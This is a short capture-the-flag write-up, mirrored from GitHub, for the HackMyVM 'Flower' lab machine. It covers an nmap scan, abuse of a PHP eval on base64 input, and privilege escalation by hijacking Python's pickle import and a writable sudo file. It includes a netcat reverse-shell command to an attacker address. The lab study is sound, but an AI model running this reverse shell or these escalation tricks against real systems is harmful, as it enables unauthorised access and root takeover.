Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/HackMyVM/Flower.md
AbdullahRizwan101 1a26893232
Add files via upload
2021-01-12 03:03:30 +05:00

2 KiB
Raw Blame History

HackMyVM-Flower

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-12 02:02 PKT
Nmap scan report for dominator.hmv (192.168.1.6)
Host is up (0.000079s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:8D:A3:F6 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds

PORT 80

On running gobuster it seems that there is only an index.php

Looking at the source code of web page we see that value is actually a base64 encoded text

These value are being sent to the sever and the server might be using eval so there is an exploit to it by ecnoding the exploit as base64 and replacing it with the actual value.

To get a reverse shell encode system('nc 192.168.1.8 2222 -e /bin/bash') to base64 and do the exact same thing

Now we know diary.py can be ran as user rose and we know that it is using python library named pickle

We can create a malicious library by the name of pickle.py and place it with diary.py because python searches for library in which it is being executed.

Doing a sudo -l again with rose

As .plantbook is writeable add /bin/bash to the file and then run as root